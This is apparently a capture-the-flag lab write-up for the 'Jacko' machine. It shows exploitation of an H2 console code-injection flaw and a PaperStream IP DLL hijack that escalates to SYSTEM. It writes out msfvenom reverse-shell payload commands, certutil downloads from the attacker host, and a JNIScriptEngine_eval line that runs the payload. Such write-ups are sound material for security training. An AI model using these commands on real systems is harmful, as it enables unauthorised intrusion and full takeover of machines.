# Jacko

## Information Gathering

`sudo ./nmapAutomator.sh 192.168.209.66 all`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2Fdenhw0BDC681eZWf8aFc%2Fimage.png?alt=media\&token=33c83551-03c3-49e2-aff3-63c8e3a71aab)

### Service Enumeration

### HTTP (Port 8082)

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2Fzi2gM9hABmmhd6hgCupM%2Fimage.png?alt=media\&token=1ef840ab-db0e-4969-84fd-8185d5cf1dcc)

Once logged in, we notice that this is running H2 console version 1.4.199, which happens to be vulnerable to code injection via java.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FbnPbXCtnxGrMZqHNqMM5%2Fimage.png?alt=media\&token=474119aa-6240-4e1a-92df-f2d86f367152)

## Exploit

{% embed url="<https://www.exploit-db.com/exploits/49384>" %}

We can test if this works by trying to execute the `systeminfo` command.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FDCJOAkcx5g1rMjoULuLk%2Fimage.png?alt=media\&token=49a14cb8-5d43-456f-a14a-5d37749bf333)

We first generate `shell.exe`.

`msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.49.209 LPORT=8082`

Next, we transfer `shell.exe` via an HTTP server to the target machine.

`certutil -urlcache -split -f http://192.168.49.209/home/kali/pg/jacko/shell.exe C:/Windows/Temp/shell.exe`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F8qCovuJDZJESbri4KO7o%2Fimage.png?alt=media\&token=547e004f-1a3b-4d19-9f62-37e133a299ef)

We can then execute `shell.exe` to gain our reverse shell.

`CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:/Windows/Temp/shell.exe").getInputStream()).useDelimiter("\Z").next()');`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F8BwwOfQwpgWhXDPjCDkq%2Fimage.png?alt=media\&token=a62b159d-b4e5-451c-afb1-b03dfd54ea65)

Looks like we need to fix the path variable first:

`set PATH=%SystemRoot%\system32;%SystemRoot%;`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FjRmaqQumGeXR3uLyg08n%2Fimage.png?alt=media\&token=f4dc8d4a-bac6-48db-8e3f-6afcb9fa5667)

## Privesc

Transferring winPEAS:

`cmd.exe /c certutil -urlcache -split -f http://192.168.49.209:80/opt/PEASS-ng/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe winPEASx86.exe`

Running winPEAS, we see the following.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F3KI7UlSbOwiGHpejMCRT%2Fimage.png?alt=media\&token=2b65975f-b2ad-4e3a-92bd-9e54a419c0e6)

However, both of these can't work in our case.

Under `Program Files (x86)` directory, we see `PaperStream IP`.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FBQCQ0FN6sG7ZCsd1tAcd%2Fimage.png?alt=media\&token=47539205-e96a-46f0-b5cc-4fb3b2536b38)

{% embed url="<https://www.exploit-db.com/exploits/49382>" %}

We can copy the power shell script above and generate  `shell.dll`.

`msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.49.209 LPORT=8082`

Next, we transfer both files to the target machine.

And once we run exploit.ps1, we get SYSTEM.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FVh7L1o4WFyCvJySQuk2Y%2Fimage.png?alt=media\&token=5acfae9e-c47b-4de0-a98b-d44aa30acc6c)